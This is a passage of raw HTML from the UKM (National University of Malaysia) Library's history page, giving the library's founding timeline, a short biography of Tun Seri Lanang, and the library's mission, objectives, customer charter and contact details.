Civilization Library</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-454"><a href="https://lib.hctm.ukm.my">Hospital Canselor Tuanku Muhriz Library</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-12480"><a href="https://lib.hpkk.ukm.edu.my/">Specialist Children’s Hospital Library</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4559"><a href="https://www.ukm.my/muzium/">Muzium Warisan Akademik</a></li> </ul> </li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-354"><a href="https://www.ukm.my/ptsl/?page_id=276">SERVICES</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-353"><a href="https://www.ukm.my/ptsl/?page_id=161">COLLECTION</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-355"><a href="https://www.ukm.my/ptsl/?page_id=256">FACILITIES</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-370"><a href="https://www.ukm.my/ptsl/?page_id=198">RESEARCH SUPPORT</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-581"><a href="https://www.ukm.my/ptsl/?page_id=554">GUIDE</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-3985"><a href="https://www.ukm.my/ptsl/?page_id=4091">FAQ</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-17863"><a href="https://www.ukm.my/ptsl/?page_id=17835">CONTACT US</a></li> <li class="search-toggle-li" ><a href="https://www.ukm.my/ptsl/#" class="site-search-toggle search-dropdown-toggle"><span class="screen-reader-text">Toggle website search</span><i class=" icon-magnifier" aria-hidden="true" role="img"></i></a></li></ul> <div id="mobile-menu-search" class="clr"> <form aria-label="Search this website" method="get" action="https://www.ukm.my/ptsl/" class="mobile-searchform"> <input aria-label="Insert search query" value="" class="field" id="ocean-mobile-search-2" type="search" name="s" autocomplete="off" placeholder="Search" /> <button aria-label="Submit search" type="submit" class="searchform-submit"> <i class=" icon-magnifier" aria-hidden="true" role="img"></i> </button> <input type="hidden" name="lang" value="en" /> </form> </div><!-- .mobile-menu-search --> </nav> </div> </header><!-- #site-header --> <main id="main" class="site-main clr" role="main"> <div data-elementor-type="wp-page" data-elementor-id="247" class="elementor elementor-247"> <section class="elementor-section elementor-top-section elementor-element elementor-element-f54feaf elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="f54feaf" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-8d42c6a" data-id="8d42c6a" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-e10dff3 cpel-switcher--align-right cpel-switcher--layout-horizontal elementor-widget elementor-widget-polylang-language-switcher" data-id="e10dff3" data-element_type="widget" data-widget_type="polylang-language-switcher.default"> <div class="elementor-widget-container"> <nav class="cpel-switcher__nav"><ul class="cpel-switcher__list"><li class="cpel-switcher__lang"><a lang="ms-MY" hreflang="ms-MY" href="https://www.ukm.my/ptsl/?page_id=1304&lang=ms"><span class="cpel-switcher__name">Bahasa Melayu</span></a></li></ul></nav> </div> </div> </div> </div> </div> </section> <header class="elementor-section elementor-top-section elementor-element elementor-element-6c751c94 elementor-section-height-min-height elementor-section-content-middle elementor-reverse-mobile elementor-section-items-stretch elementor-section-boxed elementor-section-height-default" data-id="6c751c94" data-element_type="section" data-settings="{"background_background":"classic"}"> <div class="elementor-background-overlay"></div> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-13903c1f" data-id="13903c1f" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> <div class="elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-9cd734a" data-id="9cd734a" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> <div class="elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-84e7b9f" data-id="84e7b9f" data-element_type="column"> <div class="elementor-widget-wrap"> </div> </div> <div class="elementor-column elementor-col-25 elementor-top-column elementor-element elementor-element-dccffd2" data-id="dccffd2" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-db79367 elementor-widget elementor-widget-image" data-id="db79367" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img fetchpriority="high" decoding="async" width="1024" height="194" src="https://www.ukm.my/ptsl/wp-content/uploads/2022/08/NARATIF-BAHARU-UKM-LOGO-1-1024x194-1.png" class="attachment-large size-large wp-image-11195" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2022/08/NARATIF-BAHARU-UKM-LOGO-1-1024x194-1.png 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2022/08/NARATIF-BAHARU-UKM-LOGO-1-1024x194-1-300x57.png 300w, https://www.ukm.my/ptsl/wp-content/uploads/2022/08/NARATIF-BAHARU-UKM-LOGO-1-1024x194-1-768x146.png 768w" sizes="(max-width: 1024px) 100vw, 1024px" /> </div> </div> </div> </div> </div> </header> <section class="elementor-section elementor-top-section elementor-element elementor-element-845543c elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="845543c" data-element_type="section" data-settings="{"background_background":"classic","shape_divider_bottom":"triangle"}"> <div class="elementor-background-overlay"></div> <div class="elementor-shape elementor-shape-bottom" data-negative="false"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 100" preserveAspectRatio="none"> <path class="elementor-shape-fill" d="M500,98.9L0,6.1V0h1000v6.1L500,98.9z"/> </svg> </div> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-946b3a6" data-id="946b3a6" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-5559948 elementor-widget elementor-widget-heading" data-id="5559948" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h1 class="elementor-heading-title elementor-size-default">HISTORY</h1> </div> </div> <div class="elementor-element elementor-element-53efb32 elementor-widget-divider--view-line elementor-widget elementor-widget-divider" data-id="53efb32" data-element_type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"> </span> </div> </div> </div> <div class="elementor-element elementor-element-7ff172f elementor-widget elementor-widget-spacer" data-id="7ff172f" data-element_type="widget" data-widget_type="spacer.default"> <div class="elementor-widget-container"> <div class="elementor-spacer"> <div class="elementor-spacer-inner"></div> </div> </div> </div> <div class="elementor-element elementor-element-be54a32 elementor-view-default elementor-widget elementor-widget-icon" data-id="be54a32" data-element_type="widget" data-widget_type="icon.default"> <div class="elementor-widget-container"> <div class="elementor-icon-wrapper"> <div class="elementor-icon"> <i class="fa fa-adn" aria-hidden="true"></i> </div> </div> </div> </div> <section class="elementor-section elementor-inner-section elementor-element elementor-element-742a8d6 elementor-section-content-middle envato-kit-80-timeline elementor-reverse-mobile elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="742a8d6" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-50 elementor-inner-column elementor-element elementor-element-4f12890" data-id="4f12890" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-8efd8d6 elementor-widget elementor-widget-heading" data-id="8efd8d6" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default">ESTABLISHMENT OF LIBRARY</h3> </div> </div> <div class="elementor-element elementor-element-9776eea elementor-widget elementor-widget-text-editor" data-id="9776eea" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p><span style="font-weight: 400;">The UKM Library was established simultaneously with the establishment of UKM on 18 May 1970 in Lembah Pantai, Kuala Lumpur. In 1977, the Library moved to a campus in Bangi and at first used Level 5 of the Chancellory Building, UKM before moving to the permanent building of the library.</span></p> </div> </div> </div> </div> <div class="elementor-column elementor-col-50 elementor-inner-column elementor-element elementor-element-f487e5d" data-id="f487e5d" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-479c2a4 elementor-hidden-phone elementor-widget elementor-widget-heading" data-id="479c2a4" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">1970</h2> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-ce454af elementor-section-content-middle envato-kit-80-timeline elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="ce454af" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-50 elementor-inner-column elementor-element elementor-element-bb501a6" data-id="bb501a6" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-c96ac57 elementor-hidden-phone elementor-widget elementor-widget-heading" data-id="c96ac57" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">1978</h2> </div> </div> </div> </div> <div class="elementor-column elementor-col-50 elementor-inner-column elementor-element elementor-element-c1e5a36" data-id="c1e5a36" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-10a4a63 elementor-widget elementor-widget-heading" data-id="10a4a63" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default">TUN SERI LANANG LIBRARY</h3> </div> </div> <div class="elementor-element elementor-element-a3f704e elementor-widget elementor-widget-text-editor" data-id="a3f704e" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p><span style="font-weight: 400;">The library building in Bangi was first used in 1978 and was officiated by His Majesty DYMM Tuanku Jaafar ibni Almarhum Tuanku Abdul Rahman on 2 July 1980. The building was named Tun Seri Lanang Library in honour of a nobleman and a famous literary figure in Malaya in the 16th century.</span></p> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-inner-section elementor-element elementor-element-771ca38 elementor-section-content-middle envato-kit-80-timeline elementor-reverse-mobile elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="771ca38" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-50 elementor-inner-column elementor-element elementor-element-31ad29c" data-id="31ad29c" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-8d25f59 elementor-widget elementor-widget-heading" data-id="8d25f59" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h3 class="elementor-heading-title elementor-size-default">UKM LIBRARY</h3> </div> </div> <div class="elementor-element elementor-element-8a638a6 elementor-widget elementor-widget-text-editor" data-id="8a638a6" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p><span style="font-weight: 400;">UKM Library consists of Tun Seri Lanang Library as the main library in Bangi Campus and seven branch libraries: The Law Library, The Malay World and Civilization Library (Bangi), </span><span style="font-family: 'PT Sans', sans-serif; font-size: 14px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;">Second Cluster Library,</span><span style="font-size: 14px; font-weight: 400;"> Dr. Abdul Latif Library (Kuala Lumpur), Canselor Tuanku Muhriz Hospital Library (Cheras), </span><span style="font-family: 'PT Sans', sans-serif; font-size: 14px; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: 400;">Preclinical Library (Cheras), </span><span style="font-size: 14px; font-weight: 400;"> Specialist Children Hospital Library (Cheras) and Museum of Academic Heritage & Tuanku Chancellor Gallery.</span></p> </div> </div> <div class="elementor-element elementor-element-6e6800f elementor-widget-divider--view-line elementor-widget elementor-widget-divider" data-id="6e6800f" data-element_type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"> </span> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-50 elementor-inner-column elementor-element elementor-element-9c46473" data-id="9c46473" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-1bde261 elementor-hidden-phone elementor-widget elementor-widget-heading" data-id="1bde261" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">2022</h2> </div> </div> </div> </div> </div> </section> <div class="elementor-element elementor-element-ebc3c4d elementor-view-default elementor-widget elementor-widget-icon" data-id="ebc3c4d" data-element_type="widget" data-widget_type="icon.default"> <div class="elementor-widget-container"> <div class="elementor-icon-wrapper"> <div class="elementor-icon"> <i aria-hidden="true" class="fab fa-adn"></i> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-top-section elementor-element elementor-element-262a0df elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="262a0df" data-element_type="section" data-settings="{"background_background":"classic"}"> <div class="elementor-container elementor-column-gap-no"> <div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-5904640" data-id="5904640" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-8f4601e elementor-widget elementor-widget-heading" data-id="8f4601e" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Library Info</h2> </div> </div> <div class="elementor-element elementor-element-4589f32 elementor-widget-divider--view-line elementor-widget elementor-widget-divider" data-id="4589f32" data-element_type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"> </span> </div> </div> </div> <div class="elementor-element elementor-element-34cdeff elementor-widget elementor-widget-accordion" data-id="34cdeff" data-element_type="widget" data-widget_type="accordion.default"> <div class="elementor-widget-container"> <div class="elementor-accordion"> <div class="elementor-accordion-item"> <div id="elementor-tab-title-5531" class="elementor-tab-title" data-tab="1" role="button" aria-controls="elementor-tab-content-5531" aria-expanded="false"> <span class="elementor-accordion-icon elementor-accordion-icon-right" aria-hidden="true"> <span class="elementor-accordion-icon-closed"><i class="fas fa-plus"></i></span> <span class="elementor-accordion-icon-opened"><i class="fas fa-minus"></i></span> </span> <a class="elementor-accordion-title" tabindex="0">Who is Tun Seri Lanang?</a> </div> <div id="elementor-tab-content-5531" class="elementor-tab-content elementor-clearfix" data-tab="1" role="region" aria-labelledby="elementor-tab-title-5531"><p><span style="font-weight: 400;">Tun Seri Lanang was an official of the Johor royalty who wrote ‘Sejarah Melayu’ or ‘Sulalatus Salatin’ (1612).He was born in 1565 in Bukit Seluyut, Kota Tinggi, Johor. His actual name was Tun Muhammad. His father was Orang Kaya Paduka Raja Ahmad and his mother was Tun Gengang. He came from a wealthy family or had the title because his ancestors were the family of the Bendahara Sri Maharaja of Melaka, leading to him Mani Purindan of Bukit Siguntang descent. Tun Seri Lanang was appointed the 14th Treasurer with the title of Bendahara Sri Maharaja Johor in 1580, by Sultan Ala-Jalla Abdul Jalil Syah. He died in 1615 in Aceh.</span></p><p><span style="font-weight: 400;">Source: Johor YWJ Literary Heritage (1997)</span></p></div> </div> <div class="elementor-accordion-item"> <div id="elementor-tab-title-5532" class="elementor-tab-title" data-tab="2" role="button" aria-controls="elementor-tab-content-5532" aria-expanded="false"> <span class="elementor-accordion-icon elementor-accordion-icon-right" aria-hidden="true"> <span class="elementor-accordion-icon-closed"><i class="fas fa-plus"></i></span> <span class="elementor-accordion-icon-opened"><i class="fas fa-minus"></i></span> </span> <a class="elementor-accordion-title" tabindex="0">Vission</a> </div> <div id="elementor-tab-content-5532" class="elementor-tab-content elementor-clearfix" data-tab="2" role="region" aria-labelledby="elementor-tab-title-5532"><p>The library is determined to be the catalyst of a knowledgeable society.</p></div> </div> <div class="elementor-accordion-item"> <div id="elementor-tab-title-5533" class="elementor-tab-title" data-tab="3" role="button" aria-controls="elementor-tab-content-5533" aria-expanded="false"> <span class="elementor-accordion-icon elementor-accordion-icon-right" aria-hidden="true"> <span class="elementor-accordion-icon-closed"><i class="fas fa-plus"></i></span> <span class="elementor-accordion-icon-opened"><i class="fas fa-minus"></i></span> </span> <a class="elementor-accordion-title" tabindex="0">Mission</a> </div> <div id="elementor-tab-content-5533" class="elementor-tab-content elementor-clearfix" data-tab="3" role="region" aria-labelledby="elementor-tab-title-5533"><p>Enhancing the culture of knowledge and efforts to uphold Malay language as well as<span lang="en"> encouraging the emergence of new knowledge.</span></p></div> </div> <div class="elementor-accordion-item"> <div id="elementor-tab-title-5534" class="elementor-tab-title" data-tab="4" role="button" aria-controls="elementor-tab-content-5534" aria-expanded="false"> <span class="elementor-accordion-icon elementor-accordion-icon-right" aria-hidden="true"> <span class="elementor-accordion-icon-closed"><i class="fas fa-plus"></i></span> <span class="elementor-accordion-icon-opened"><i class="fas fa-minus"></i></span> </span> <a class="elementor-accordion-title" tabindex="0">Objectives</a> </div> <div id="elementor-tab-content-5534" class="elementor-tab-content elementor-clearfix" data-tab="4" role="region" aria-labelledby="elementor-tab-title-5534"><ul><li><span style="font-weight: 400;"> To develop and manage information resources in meeting the teaching, learning and research needs of the university</span></li><li><span style="font-weight: 400;"> To provide information services that meet customer needs</span></li><li><span style="font-weight: 400;"> To improve the collection of materials in bahasa Melayu</span></li><li><span style="font-weight: 400;"> To provide infrastructure and knowledge environment in line with technological developments</span></li><li><span style="font-weight: 400;"> To become a university repository institution</span></li></ul></div> </div> <div class="elementor-accordion-item"> <div id="elementor-tab-title-5535" class="elementor-tab-title" data-tab="5" role="button" aria-controls="elementor-tab-content-5535" aria-expanded="false"> <span class="elementor-accordion-icon elementor-accordion-icon-right" aria-hidden="true"> <span class="elementor-accordion-icon-closed"><i class="fas fa-plus"></i></span> <span class="elementor-accordion-icon-opened"><i class="fas fa-minus"></i></span> </span> <a class="elementor-accordion-title" tabindex="0">Motto</a> </div> <div id="elementor-tab-content-5535" class="elementor-tab-content elementor-clearfix" data-tab="5" role="region" aria-labelledby="elementor-tab-title-5535"><p>‘Perpustakaan Pemangkin Masyarakat Berilmu’</p></div> </div> <div class="elementor-accordion-item"> <div id="elementor-tab-title-5536" class="elementor-tab-title" data-tab="6" role="button" aria-controls="elementor-tab-content-5536" aria-expanded="false"> <span class="elementor-accordion-icon elementor-accordion-icon-right" aria-hidden="true"> <span class="elementor-accordion-icon-closed"><i class="fas fa-plus"></i></span> <span class="elementor-accordion-icon-opened"><i class="fas fa-minus"></i></span> </span> <a class="elementor-accordion-title" tabindex="0">Customer CHarter</a> </div> <div id="elementor-tab-content-5536" class="elementor-tab-content elementor-clearfix" data-tab="6" role="region" aria-labelledby="elementor-tab-title-5536"><ol> <li>Ensure that customer complaints are given an acknowledgment of receipt within three (3) working days.</li> <li>Process books within thirty five (35) working days.</li> <li>Provide information services within the set time:</li> </ol> <ul> <li>Loan and return of materials within two (2) minutes.</li> <li>Inter Library Loan (ILL) within ten (10) working days.</li> <li>Information Package within ten (10) working days.</li> <li>Quick reference within five (5) minutes.</li> </ul></div> </div> </div> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-top-section elementor-element elementor-element-ef7a83f elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="ef7a83f" data-element_type="section" data-settings="{"background_background":"classic"}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-33 elementor-top-column elementor-element elementor-element-f9b4a5f" data-id="f9b4a5f" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-6cedd6f elementor-widget elementor-widget-heading" data-id="6cedd6f" data-element_type="widget" data-widget_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Contact Us</h2> </div> </div> <div class="elementor-element elementor-element-5b7a059 elementor-widget elementor-widget-text-editor" data-id="5b7a059" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <p>Tun Seri Lanang Library,<br />Universiti Kebangsaan Malaysia<br />43600 Bangi, Selangor Darul Ehsan,Malaysia<br /><span data-wahfont="14">+603-89213446 – Consultation Services<br /></span><span data-wahfont="14">019-2045652 – Telegram/Whatsapp<br /></span><span data-wahfont="14">603-89256067 (FAKS)<br /></span><span data-wahfont="14">Email: </span><a role="link" href="mailto:helpdeskptsl@ukm.edu.my" data-wahfont="14">helpdeskptsl@ukm.edu.my</a></p> </div> </div> <div class="elementor-element elementor-element-52c0e2c elementor-shape-rounded elementor-grid-0 e-grid-align-center elementor-widget elementor-widget-social-icons" data-id="52c0e2c" data-element_type="widget" data-widget_type="social-icons.default"> <div class="elementor-widget-container"> <div class="elementor-social-icons-wrapper elementor-grid"> <span class="elementor-grid-item"> <a class="elementor-icon elementor-social-icon elementor-social-icon-facebook elementor-repeater-item-f1e2030" href="https://www.facebook.com/ptslukm/" target="_blank"> <span class="elementor-screen-only">Facebook</span> <i class="fab fa-facebook"></i> </a> </span> <span class="elementor-grid-item"> <a class="elementor-icon elementor-social-icon elementor-social-icon-twitter elementor-repeater-item-7684840" target="_blank"> <span class="elementor-screen-only">Twitter</span> <i class="fab fa-twitter"></i> </a> </span> <span class="elementor-grid-item"> <a class="elementor-icon elementor-social-icon elementor-social-icon-youtube elementor-repeater-item-5f7b65b" target="_blank"> <span class="elementor-screen-only">Youtube</span> <i class="fab fa-youtube"></i> </a> </span> </div> </div> </div> <div class="elementor-element elementor-element-23fa8e5 elementor-widget-divider--view-line elementor-widget elementor-widget-divider" data-id="23fa8e5" data-element_type="widget" data-widget_type="divider.default"> <div class="elementor-widget-container"> <div class="elementor-divider"> <span class="elementor-divider-separator"> </span> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-33 elementor-top-column elementor-element elementor-element-34d4408" data-id="34d4408" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-b9b9255 elementor-widget elementor-widget-image" data-id="b9b9255" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img decoding="async" width="300" height="200" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/06/7H7A3663_1-300x200.jpg" class="attachment-medium size-medium wp-image-129" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/06/7H7A3663_1-300x200.jpg 300w, https://www.ukm.my/ptsl/wp-content/uploads/2020/06/7H7A3663_1-1024x683.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/06/7H7A3663_1-768x512.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/06/7H7A3663_1-1536x1024.jpg 1536w, https://www.ukm.my/ptsl/wp-content/uploads/2020/06/7H7A3663_1-2048x1365.jpg 2048w" sizes="(max-width: 300px) 100vw, 300px" /> </div> </div> </div> </div> <div class="elementor-column elementor-col-33 elementor-top-column elementor-element elementor-element-f23860f" data-id="f23860f" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-4899580 elementor-widget elementor-widget-image" data-id="4899580" data-element_type="widget" data-widget_type="image.default"> <div class="elementor-widget-container"> <img decoding="async" width="300" height="200" src="https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A3654_1-300x200.jpg" class="attachment-medium size-medium wp-image-900" alt="" srcset="https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A3654_1-300x200.jpg 300w, https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A3654_1-1024x683.jpg 1024w, https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A3654_1-768x512.jpg 768w, https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A3654_1-1536x1024.jpg 1536w, https://www.ukm.my/ptsl/wp-content/uploads/2020/09/7H7A3654_1-2048x1365.jpg 2048w" sizes="(max-width: 300px) 100vw, 300px" /> </div> </div> </div> </div> </div> </section> <section class="elementor-section elementor-top-section elementor-element elementor-element-5fc28bdf elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="5fc28bdf" data-element_type="section" data-settings="{"background_background":"classic"}"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-3b5a1a6d" data-id="3b5a1a6d" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <section class="elementor-section elementor-inner-section elementor-element elementor-element-ffd6b46 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="ffd6b46" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-50 elementor-inner-column elementor-element elementor-element-37dd2d18" data-id="37dd2d18" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-59c0d49b elementor-align-right envato-kit-80-cta elementor-widget elementor-widget-button" data-id="59c0d49b" data-element_type="widget" data-widget_type="button.default"> <div class="elementor-widget-container"> <div class="elementor-button-wrapper"> <a class="elementor-button elementor-button-link elementor-size-sm" href="#"> <span class="elementor-button-content-wrapper"> <span class="elementor-button-text">Perpustakaan Pemangkin Masyarakat Berilmu</span> </span> </a> </div> </div> </div> </div> </div> <div class="elementor-column elementor-col-50 elementor-inner-column elementor-element elementor-element-49ac2564" data-id="49ac2564" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-67de388e elementor-view-default elementor-widget elementor-widget-icon" data-id="67de388e" data-element_type="widget" data-widget_type="icon.default"> <div class="elementor-widget-container"> <div class="elementor-icon-wrapper"> <a class="elementor-icon" href="#"> <i class="fa fa-forward" aria-hidden="true"></i> </a> </div> </div> </div> </div> </div> </div> </section> </div> </div> </div> </section> </div> </main><!-- #main --> <footer id="footer" class="site-footer" itemscope="itemscope" itemtype="https://schema.org/WPFooter" role="contentinfo"> <div id="footer-inner" class="clr"> <div id="footer-widgets" class="oceanwp-row clr"> <div class="footer-widgets-inner container"> <div class="footer-box span_1_of_4 col col-1"> </div><!-- .footer-one-box --> <div class="footer-box span_1_of_4 col col-2"> </div><!-- .footer-one-box --> <div class="footer-box span_1_of_4 col col-3 "> </div><!-- .footer-one-box --> <div class="footer-box span_1_of_4 col col-4"> </div><!-- .footer-box --> </div><!-- .container --> </div><!-- #footer-widgets --> <div id="footer-bottom" class="clr no-footer-nav"> <div id="footer-bottom-inner" class="container clr"> <div id="copyright" class="clr" role="contentinfo"> Copyright © The National University of Malaysia Library </div><!-- #copyright --> </div><!-- #footer-bottom-inner --> </div><!-- #footer-bottom --> </div><!-- #footer-inner --> </footer><!-- #footer --> </div><!-- #wrap --> </div><!-- #outer-wrap --> <a aria-label="Scroll to the top of the page" href="#" id="scroll-top" class="scroll-top-right"><i class=" fa fa-angle-up" aria-hidden="true" role="img"></i></a> <!--Start of Tawk.to Script (0.9.0)--> <script id="tawk-script" type="text/javascript"> var Tawk_API = Tawk_API || {}; var Tawk_LoadStart=new Date(); (function(){ var s1 = document.createElement( 'script' ),s0=document.getElementsByTagName( 'script' )[0]; s1.async = true; s1.src = 'https://embed.tawk.to/5fd081bfa1d54c18d8f1d89f/default'; s1.charset = 'UTF-8'; s1.setAttribute( 'crossorigin','*' ); s0.parentNode.insertBefore( s1, s0 ); })(); </script> <!--End of Tawk.to Script (0.9.0)--> <div id="wp_access_helper_container" class="accessability_container dark_theme"> <!-- WP Accessibility Helper (WAH) - https://wordpress.org/plugins/wp-accessibility-helper/ --> <!-- Official plugin website - https://accessibility-helper.co.il --> <button type="button" class="wahout aicon_link" accesskey="z" aria-label="Accessibility Helper sidebar" title="Accessibility Helper sidebar"> <img src="https://www.ukm.my/ptsl/wp-content/plugins/wp-accessibility-helper/assets/images/accessibility-48.jpg" alt="Accessibility" class="aicon_image" /> </button> <div id="access_container" aria-hidden="true"> <button tabindex="-1" type="button" class="close_container wahout" accesskey="x" aria-label="Close" title="Close"> Close </button> <div class="access_container_inner"> <div class="a_module wah_font_resize"> <div class="a_module_title">Font size</div> <div class="a_module_exe font_resizer"> <button tabindex="-1" type="button" class="wah-action-button smaller wahout" title="smaller font size" aria-label="smaller font size">A-</button> <button tabindex="-1" type="button" class="wah-action-button larger wahout" title="larger font size" aria-label="larger font size">A+</button><button tabindex="-1" type="button" class="wah-action-button wah-font-reset wahout" title="Reset font size" aria-label="Reset font size">Reset</button> </div> </div><div class="a_module wah_keyboard_navigation"> <div class="a_module_exe"> <button tabindex="-1" type="button" class="wah-action-button wahout wah-call-keyboard-navigation" aria-label="Keyboard navigation" title="Keyboard navigation">Keyboard navigation</button> </div> </div><div class="a_module wah_readable_fonts"> <div class="a_module_exe readable_fonts"> <button tabindex="-1" type="button" class="wah-action-button wahout wah-call-readable-fonts" aria-label="Readable Font" title="Readable Font">Readable Font</button> </div> </div><div class="a_module wah_contrast_trigger"> <div class="a_module_title">Colors</div> <div class="a_module_exe"> <button tabindex="-1" type="button" id="contrast_trigger" class="contrast_trigger wah-action-button wahout wah-call-contrast-trigger" title="Contrast">Choose color</button> <div class="color_selector" aria-hidden="true"> <button type="button" class="convar black wahout" data-bgcolor="#000" data-color="#FFF" title="black">black</button> <button type="button" class="convar white wahout" data-bgcolor="#FFF" data-color="#000" title="white">white</button> <button type="button" class="convar green wahout" data-bgcolor="#00FF21" data-color="#000" title="green">green</button> <button type="button" class="convar blue wahout" data-bgcolor="#0FF" data-color="#000" title="blue">blue</button> <button type="button" class="convar red wahout" data-bgcolor="#F00" data-color="#000" title="red">red</button> <button type="button" class="convar orange wahout" data-bgcolor="#FF6A00" data-color="#000" title="orange">orange</button> <button type="button" class="convar yellow wahout" data-bgcolor="#FFD800" data-color="#000" title="yellow">yellow</button> <button type="button" class="convar navi wahout" data-bgcolor="#B200FF" data-color="#000" title="navi">navi</button> </div> </div> </div><div class="a_module wah_underline_links"> <div class="a_module_exe"> <button tabindex="-1" type="button" class="wah-action-button wahout wah-call-underline-links" aria-label="Underline links" title="Underline links">Underline links</button> </div> </div><div class="a_module wah_highlight_links"> 